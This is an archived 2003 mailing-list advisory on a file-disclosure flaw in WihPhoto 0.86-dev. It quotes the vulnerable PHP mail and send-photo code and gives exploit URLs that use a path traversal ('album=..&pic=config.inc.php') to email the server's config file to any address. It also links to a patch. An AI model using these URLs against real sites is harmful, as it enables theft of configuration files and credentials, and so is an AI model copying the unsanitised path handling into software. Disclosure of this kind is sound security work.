Informations : °°°°°°°°°°°°°° Version : 0.86-dev Website : http://www.wihsy.com problem : All files from the hard disk can be send by mail PHP Code/Location : °°°°°°°°°°°°°°°°°°° util/email.php : ------------------------------------------------------------------------ <? class CMailFile { var $subject; var $addr_to; var $text_body; var $text_encoded; var $mime_headers; var $mime_boundary = "--==================_846811060==_"; var $smtp_headers; function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) { $this->subject = $subject; $this->addr_to = $to; $this->smtp_headers = $this->write_smtpheaders($from); $this->text_body = $this->write_body($msg); $this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename); $this->mime_headers = $this->write_mimeheaders($filename, $mime_filename); } function attach_file($filename,$mimetype,$mime_filename) { $encoded = $this->encode_file($filename); if ($mime_filename) $filename = $mime_filename; $out = "--" . $this->mime_boundary . "\n"; $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n"; $out = $out . "Content-Transfer-Encoding: base64\n"; $out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n"; $out = $out . $encoded . "\n"; $out = $out . "--" . $this->mime_boundary . "--" . "\n"; return $out; // added -- to notify email client attachment is done } function encode_file($sourcefile) { if (is_readable($sourcefile)) { $fd = fopen($sourcefile, "r"); $contents = fread($fd, filesize($sourcefile)); $encoded = my_chunk_split(base64_encode($contents)); fclose($fd); } return $encoded; } function sendfile() { $headers = $this->smtp_headers . $this->mime_headers; $message = $this->text_body . $this->text_encoded; mail($this->addr_to,$this->subject,$message,$headers); } [...] function write_mimeheaders($filename, $mime_filename) { if ($mime_filename) $filename = $mime_filename; $out = "MIME-version: 1.0\n"; $out = $out . "Content-type: multipart/mixed; "; $out = $out . "boundary=\"$this->mime_boundary\"\n"; $out = $out . "Content-transfer-encoding: 7BIT\n"; $out = $out . "X-attachments: $filename;\n\n"; return $out; } [...] } [...] ------------------------------------------------------------------------ sendphoto.php : ------------------------------------------------------------------------ include("util/email.php"); include("config.inc.php"); [...] if (!$filled) { print "<FORM METHOD=POST ACTION=sendphoto.php>\n"; print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n"; print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n"; print "<INPUT TYPE=hidden NAME=album VALUE="; print rawurlencode($album); print ">\n"; print "<center><p>$sendphoto_send_photo_to<br>"; print "<INPUT NAME=sendto></input></center>\n"; print "<p>\n"; print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n"; print "</form>\n"; print "</body></html>\n"; } else { $message = "$sendphoto_message"; $album1 = rawurldecode($album); $filetoattach = "./$pix_base/$album1/$pic"; $mimetype = "image/jpeg"; $newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype); $newmail->sendfile(); print "$sendphoto_successful"; print "</body></html>\n"; } ?> ------------------------------------------------------------------------ Exploits : °°°°°°°°°° http://[target]/sendphoto.php?album=..&pic=config.inc.php or http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be sent. Patch : °°°°°°° A patch can be found on http://www.phpsecure.info . More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/WihPhoto.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
This archive was generated by hypermail 2b30 : Sun Feb 23 2003 - 13:14:20 PST